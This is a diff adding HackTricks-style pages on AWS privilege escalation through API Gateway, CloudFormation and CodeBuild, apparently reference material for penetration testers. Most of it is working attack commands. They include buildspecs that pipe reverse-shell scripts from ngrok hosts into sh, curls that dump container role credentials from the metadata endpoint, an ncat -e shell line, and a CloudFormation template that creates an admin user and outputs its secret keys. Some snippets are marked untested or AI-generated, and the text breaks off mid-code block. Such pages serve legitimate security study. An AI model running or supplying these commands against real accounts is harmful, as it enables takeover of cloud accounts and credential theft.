+aws apigateway put-integration --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --type AWS_PROXY --integration-http-method POST --uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations --credentials $LAMBDA_ROLE_ARN
+
+# Create a deployment for the updated API Gateway REST API
+aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
+```
+{% endcode %}
+
+**Potential Impact**: Access to resources associated with the Lambda function's IAM role.
+
+### `apigateway:UpdateAuthorizer`, `apigateway:CreateDeployment`
+
+{% hint style="info" %}
+Need testing
+{% endhint %}
+
+An attacker with the permissions `apigateway:UpdateAuthorizer` and `apigateway:CreateDeployment` can **modify an existing API Gateway authorizer** to bypass security checks or to execute arbitrary code when API requests are made.
+
+{% code overflow="wrap" %}
+```bash
+API_ID="your-api-id"
+AUTHORIZER_ID="your-authorizer-id"
+LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"
+
+# Update the API Gateway authorizer
+aws apigateway update-authorizer --rest-api-id $API_ID --authorizer-id $AUTHORIZER_ID --authorizer-uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations
+
+# Create a deployment for the updated API Gateway REST API
+aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
+```
+{% endcode %}
+
+**Potential Impact**: Bypassing security checks, unauthorized access to API resources.
+
+### `apigateway:UpdateVpcLink`
+
+{% hint style="info" %}
+Need testing
+{% endhint %}
+
+An attacker with the permission `apigateway:UpdateVpcLink` can **modify an existing VPC Link to point to a different Network Load Balancer, potentially redirecting private API traffic to unauthorized or malicious resources**.
+
+```bash
+bashCopy codeVPC_LINK_ID="your-vpc-link-id"
+NEW_NLB_ARN="arn:aws:elasticloadbalancing:region:account-id:loadbalancer/net/new-load-balancer-name/50dc6c495c0c9188"
+
+# Update the VPC Link
+aws apigateway update-vpc-link --vpc-link-id $VPC_LINK_ID --patch-operations op=replace,path=/targetArns,value="[$NEW_NLB_ARN]"
+```
+
+**Potential Impact**: Unauthorized access to private API resources, interception or disruption of API traffic.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md
new file mode 100644
index 0000000000..7294ee888a
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md
@@ -0,0 +1,35 @@
+# AWS - Chime Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### chime:CreateApiKey
+
+TODO
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md
new file mode 100644
index 0000000000..f810969439
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md
@@ -0,0 +1,144 @@
+# AWS - Cloudformation Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## cloudformation
+
+For more information about cloudformation check:
+
+{% content-ref url="../../aws-services/aws-cloudformation-and-codestar-enum.md" %}
+[aws-cloudformation-and-codestar-enum.md](../../aws-services/aws-cloudformation-and-codestar-enum.md)
+{% endcontent-ref %}
+
+### `iam:PassRole`, `cloudformation:CreateStack`
+
+An attacker with these permissions **can escalate privileges** by crafting a **CloudFormation stack** with a custom template, hosted on their server, to **execute actions under the permissions of a specified role:**
+
+```bash
+aws cloudformation create-stack --stack-name <stack-name> \
+    --template-url http://attacker.com/attackers.template \
+    --role-arn <arn-role>
+```
+
+In the following page you have an **exploitation example** with the additional permission **`cloudformation:DescribeStacks`**:
+
+{% content-ref url="iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md" %}
+[iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md](iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md)
+{% endcontent-ref %}
+
+**Potential Impact:** Privesc to the cloudformation service role specified.
+
+### `iam:PassRole`, (`cloudformation:UpdateStack` | `cloudformation:SetStackPolicy`)
+
+In this case you can a**buse an existing cloudformation stack** to update it and escalate privileges as in the previous scenario:
+
+```bash
+aws cloudformation update-stack \
+    --stack-name privesc \
+    --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
+    --role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \
+    --capabilities CAPABILITY_IAM \
+    --region eu-west-1 
+```
+
+The `cloudformation:SetStackPolicy` permission can be used to **give yourself `UpdateStack` permission** over a stack and perform the attack.
+
+**Potential Impact:** Privesc to the cloudformation service role specified.
+
+### `cloudformation:UpdateStack` | `cloudformation:SetStackPolicy`
+
+If you have this permission but **no `iam:PassRole`** you can still **update the stacks** used and abuse the **IAM Roles they have already attached**. Check the previous section for exploit example (just don't indicate any role in the update).
+
+The `cloudformation:SetStackPolicy` permission can be used to **give yourself `UpdateStack` permission** over a stack and perform the attack.
+
+**Potential Impact:** Privesc to the cloudformation service role already attached.
+
+### `iam:PassRole`,((`cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet`) | `cloudformation:SetStackPolicy`)
+
+An attacker with permissions to **pass a role and create & execute a ChangeSet** can **create/update a new cloudformation stack abuse the cloudformation service roles** just like with the CreateStack or UpdateStack.
+
+The following exploit is a **variation of the**[ **CreateStack one**](./#iam-passrole-cloudformation-createstack) using the **ChangeSet permissions** to create a stack.
+
+```bash
+aws cloudformation create-change-set \
+    --stack-name privesc \
+    --change-set-name privesc \
+    --change-set-type CREATE \
+    --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
+    --role arn:aws:iam::947247140022:role/CloudFormationAdmin \
+    --capabilities CAPABILITY_IAM \
+    --region eu-west-1
+
+echo "Waiting 2 mins to change the stack"
+sleep 120
+
+aws cloudformation execute-change-set \
+    --change-set-name privesc \
+    --stack-name privesc \
+    --region eu-west-1
+
+echo "Waiting 2 mins to execute the stack"
+sleep 120
+
+aws cloudformation describe-stacks \
+    --stack-name privesc \
+    --region eu-west-1
+```
+
+The `cloudformation:SetStackPolicy` permission can be used to **give yourself `ChangeSet` permissions** over a stack and perform the attack.
+
+**Potential Impact:** Privesc to cloudformation service roles.
+
+### (`cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet`) | `cloudformation:SetStackPolicy`)
+
+This is like the previous method without passing **IAM roles**, so you can just **abuse already attached ones**, just modify the parameter:
+
+```
+--change-set-type UPDATE
+```
+
+**Potential Impact:** Privesc to the cloudformation service role already attached.
+
+### `iam:PassRole`,(`cloudformation:CreateStackSet` | `cloudformation:UpdateStackSet`)
+
+An attacker could abuse these permissions to create/update StackSets to abuse arbitrary cloudformation roles.
+
+**Potential Impact:** Privesc to cloudformation service roles.
+
+### `cloudformation:UpdateStackSet`
+
+An attacker could abuse this permission without the passRole permission to update StackSets to abuse the attached cloudformation roles.
+
+**Potential Impact:** Privesc to the attached cloudformation roles.
+
+## References
+
+* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md
new file mode 100644
index 0000000000..8147ce3818
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md
@@ -0,0 +1,109 @@
+# iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+An attacker could for example use a **cloudformation template** that generates **keys for an admin** user like:
+
+```json
+{
+     "Resources": {
+         "AdminUser": {
+             "Type": "AWS::IAM::User"
+         },
+         "AdminPolicy": {
+             "Type": "AWS::IAM::ManagedPolicy",
+                 "Properties": {
+                 "Description" : "This policy allows all actions on all resources.",
+                 "PolicyDocument": {
+                     "Version": "2012-10-17",
+                     "Statement": [
+                     {
+                         "Effect": "Allow",
+                         "Action": [
+                         "*"
+                         ],
+                         "Resource": "*"
+                     }]
+                 },
+                 "Users": [{
+                     "Ref": "AdminUser"
+                 }]
+             }
+         },
+         "MyUserKeys": {
+             "Type": "AWS::IAM::AccessKey",
+             "Properties": {
+                 "UserName": {
+                     "Ref": "AdminUser"
+                 }
+             }
+         }
+       },
+     "Outputs": {
+         "AccessKey": {
+             "Value": {
+                 "Ref": "MyUserKeys"
+             },
+             "Description": "Access Key ID of Admin User"
+         },
+         "SecretKey": {
+             "Value": {
+                 "Fn::GetAtt": [
+                 "MyUserKeys",
+                 "SecretAccessKey"
+                 ]
+             },
+             "Description": "Secret Key of Admin User"
+         }
+     }
+}
+```
+
+Then **generate the cloudformation stack**:
+
+```bash
+aws cloudformation create-stack --stack-name privesc \
+    --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
+    --role arn:aws:iam::[REDACTED]:role/adminaccess \
+    --capabilities CAPABILITY_IAM --region us-west-2
+```
+
+**Wait for a couple of minutes** for the stack to be generated and then **get the output** of the stack where the **credentials are stored**:
+
+```bash
+aws cloudformation describe-stacks \
+    --stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \
+    --region uswest-2
+```
+
+### References
+
+* [https://bishopfox.com/blog/privilege-escalation-in-aws](https://bishopfox.com/blog/privilege-escalation-in-aws)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
new file mode 100644
index 0000000000..ab4b9f46f2
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
@@ -0,0 +1,377 @@
+# AWS - Codebuild Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## codebuild
+
+Get more info in:
+
+{% content-ref url="../aws-services/aws-codebuild-enum.md" %}
+[aws-codebuild-enum.md](../aws-services/aws-codebuild-enum.md)
+{% endcontent-ref %}
+
+### `codebuild:StartBuild` | `codebuild:StartBuildBatch`
+
+Only with one of these permissions it's enough to trigger a build with a new buildspec and steal the token of the iam role assigned to the project:
+
+{% tabs %}
+{% tab title="StartBuild" %}
+{% code overflow="wrap" %}
+```bash
+cat > /tmp/buildspec.yml <<EOF
+version: 0.2
+
+phases:
+  build:
+      commands:
+            - curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
+EOF
+
+aws codebuild start-build --project <project-name> --buildspec-override file:///tmp/buildspec.yml
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="StartBuildBatch" %}
+{% code overflow="wrap" %}
+```bash
+cat > /tmp/buildspec.yml <<EOF
+version: 0.2
+
+batch:
+  fast-fail: false
+  build-list:
+    - identifier: build1
+      env:
+        variables:
+          BUILD_ID: build1
+      buildspec: |
+        version: 0.2
+        env:
+          shell: sh
+        phases:
+          build:
+            commands:
+              - curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
+      ignore-failure: true
+EOF
+
+aws codebuild start-build-batch --project <project-name> --buildspec-override file:///tmp/buildspec.yml
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
+
+**Note**: The difference between these two commands is that:
+
+* `StartBuild` triggers a single build job using a specific `buildspec.yml`.
+* `StartBuildBatch` allows you to start a batch of builds, with more complex configurations (like running multiple builds in parallel).
+
+**Potential Impact:** Direct privesc to attached AWS Codebuild roles.
+
+### `iam:PassRole`, `codebuild:CreateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
+
+An attacker with the **`iam:PassRole`, `codebuild:CreateProject`, and `codebuild:StartBuild` or `codebuild:StartBuildBatch`** permissions would be able to **escalate privileges to any codebuild IAM role** by creating a running one.
+
+{% tabs %}
+{% tab title="Example1" %}
+```bash
+# Enumerate then env and get creds
+REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
+
+# Get rev shell
+REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"
+
+JSON="{
+    \"name\": \"codebuild-demo-project\",
+    \"source\": {
+        \"type\": \"NO_SOURCE\",
+        \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
+    },
+    \"artifacts\": {
+        \"type\": \"NO_ARTIFACTS\"
+    },
+    \"environment\": {
+        \"type\": \"LINUX_CONTAINER\",
+        \"image\": \"aws/codebuild/standard:1.0\",
+        \"computeType\": \"BUILD_GENERAL1_SMALL\"
+    },
+    \"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
+}"
+
+
+REV_PATH="/tmp/rev.json"
+
+printf "$JSON" > $REV_PATH
+
+# Create project
+aws codebuild create-project --cli-input-json file://$REV_PATH
+
+# Build it
+aws codebuild start-build --project-name codebuild-demo-project
+
+# Wait 3-4 mins until it's executed
+# Then you can access the logs in the console to find the AWS role token in the output
+
+# Delete the project
+aws codebuild delete-project --name codebuild-demo-project
+```
+{% endtab %}
+
+{% tab title="Example2" %}
+{% code overflow="wrap" %}
+```bash
+# Generated by AI, not tested
+# Create a buildspec.yml file with reverse shell command
+echo 'version: 0.2
+phases:
+  build:
+    commands:
+      - curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash' > buildspec.yml
+
+# Upload the buildspec to the bucket and give access to everyone
+aws s3 cp buildspec.yml s3:<S3_BUCKET_NAME>/buildspec.yml
+
+# Create a new CodeBuild project with the buildspec.yml file
+aws codebuild create-project --name reverse-shell-project --source type=S3,location=<S3_BUCKET_NAME>/buildspec.yml --artifacts type=NO_ARTIFACTS --environment computeType=BUILD_GENERAL1_SMALL,image=aws/codebuild/standard:5.0,type=LINUX_CONTAINER --service-role <YOUR_HIGH_PRIVILEGE_ROLE_ARN> --timeout-in-minutes 60
+
+# Start a build with the new project
+aws codebuild start-build --project-name reverse-shell-project
+
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
+
+**Potential Impact:** Direct privesc to any AWS Codebuild role.
+
+{% hint style="warning" %}
+In a **Codebuild container** the file `/codebuild/output/tmp/env.sh` contains all the env vars needed to access the **metadata credentials**.
+
+This file contains the **env variable `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** which contains the **URL path** to access the credentials. It will be something like this `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420`
+
+Add that to the URL **`http://169.254.170.2/`** and you will be able to dump the role credentials.
+
+Moreover, it also contains the **env variable `ECS_CONTAINER_METADATA_URI`** which contains the complete URL to get **metadata info about the container**.
+{% endhint %}
+
+### `iam:PassRole`, `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
+
+Just like in the previous section, if instead of creating a build project you can modify it, you can indicate the IAM Role and steal the token
+
+```bash
+REV_PATH="/tmp/codebuild_pwn.json"
+
+# Enumerate then env and get creds
+REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
+
+# Get rev shell
+REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"
+
+# You need to indicate the name of the project you want to modify
+JSON="{
+    \"name\": \"<codebuild-demo-project>\",
+    \"source\": {
+        \"type\": \"NO_SOURCE\",
+        \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
+    },
+    \"artifacts\": {
+        \"type\": \"NO_ARTIFACTS\"
+    },
+    \"environment\": {
+        \"type\": \"LINUX_CONTAINER\",
+        \"image\": \"aws/codebuild/standard:1.0\",
+        \"computeType\": \"BUILD_GENERAL1_SMALL\"
+    },
+    \"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
+}"
+
+printf "$JSON" > $REV_PATH
+
+aws codebuild update-project --cli-input-json file://$REV_PATH
+
+aws codebuild start-build --project-name codebuild-demo-project
+```
+
+**Potential Impact:** Direct privesc to any AWS Codebuild role.
+
+### `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
+
+Like in the previous section but **without the `iam:PassRole` permission**, you can abuse this permissions to **modify existing Codebuild projects and access the role they already have assigned**.
+
+{% tabs %}
+{% tab title="StartBuild" %}
+{% code overflow="wrap" %}
+```sh
+REV_PATH="/tmp/codebuild_pwn.json"
+
+# Enumerate then env and get creds
+REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
+
+# Get rev shell
+REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"
+
+JSON="{
+    \"name\": \"<codebuild-demo-project>\",
+    \"source\": {
+        \"type\": \"NO_SOURCE\",
+        \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
+    },
+    \"artifacts\": {
+        \"type\": \"NO_ARTIFACTS\"
+    },
+    \"environment\": {
+        \"type\": \"LINUX_CONTAINER\",
+        \"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
+        \"computeType\": \"BUILD_GENERAL1_SMALL\",
+        \"imagePullCredentialsType\": \"CODEBUILD\"
+    }
+}"
+
+# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!
+
+printf "$JSON" > $REV_PATH
+
+aws codebuild update-project --cli-input-json file://$REV_PATH
+
+aws codebuild start-build --project-name codebuild-demo-project
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="StartBuildBatch" %}
+{% code overflow="wrap" %}
+```sh
+REV_PATH="/tmp/codebuild_pwn.json"
+
+# Get rev shell
+REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"
+
+# You need to indicate the name of the project you want to modify
+JSON="{
+    \"name\": \"project_name\",
+    \"source\": {
+        \"type\": \"NO_SOURCE\",
+        \"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n  fast-fail: false\\\\n  build-list:\\\\n    - identifier: build1\\\\n      env:\\\\n        variables:\\\\n          BUILD_ID: build1\\\\n      buildspec: |\\\\n        version: 0.2\\\\n        env:\\\\n          shell: sh\\\\n        phases:\\\\n          build:\\\\n            commands:\\\\n              - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n      ignore-failure: true\\\\n\"
+    },
+    \"artifacts\": {
+        \"type\": \"NO_ARTIFACTS\"
+    },
+    \"environment\": {
+        \"type\": \"LINUX_CONTAINER\",
+        \"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
+        \"computeType\": \"BUILD_GENERAL1_SMALL\",
+        \"imagePullCredentialsType\": \"CODEBUILD\"
+    }
+}"
+
+printf "$JSON" > $REV_PATH
+
+# Note how it's used a image from AWS public ECR instead from dockerhub as dockerhub rate limits CodeBuild!
+
+aws codebuild update-project --cli-input-json file://$REV_PATH
+
+aws codebuild start-build-batch --project-name codebuild-demo-project
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
+
+**Potential Impact:** Direct privesc to attached AWS Codebuild roles.
+
+### SSM
+
+Having **enough permissions to start a ssm session** it's possible to get **inside a Codebuild project** being built.
+
+The codebuild project will need to have a breakpoint:
+
+<pre class="language-yaml"><code class="lang-yaml">phases:
+  pre_build:
+    commands:
+      - echo Entered the pre_build phase...
+      - echo "Hello World" > /tmp/hello-world
+<strong>      - codebuild-breakpoint
+</strong></code></pre>
+
+And then:
+
+```bash
+aws codebuild batch-get-builds --ids <buildID> --region <region> --output json
+aws ssm start-session --target <sessionTarget> --region <region>
+```
+
+For more info [**check the docs**](https://docs.aws.amazon.com/codebuild/latest/userguide/session-manager.html).
+
+### (`codebuild:StartBuild` | `codebuild:StartBuildBatch`), `s3:GetObject`, `s3:PutObject`
+
+An attacker able to start/restart a build of a specific CodeBuild project which stores its `buildspec.yml` file on an S3 bucket the attacker has write access to, can obtain command execution in the CodeBuild process.
+
+Note: the escalation is relevant only if the CodeBuild worker has a different role, hopefully more privileged, than the one of the attacker.
+
+```bash
+aws s3 cp s3://<build-configuration-files-bucket>/buildspec.yml ./
+
+vim ./buildspec.yml 
+
+# Add the following lines in the "phases > pre_builds > commands" section
+#
+#    - apt-get install nmap -y
+#    - ncat <IP> <PORT> -e /bin/sh
+
+aws s3 cp ./buildspec.yml s3://<build-configuration-files-bucket>/buildspec.yml
+
+aws codebuild start-build --project-name <project-name>
+
+# Wait for the reverse shell :)
+```
+
+You can use something like this **buildspec** to get a **reverse shell**:
+
+{% code title="buildspec.yml" %}
+```yaml
+version: 0.2
+
+phases:
+  build:
+    commands:
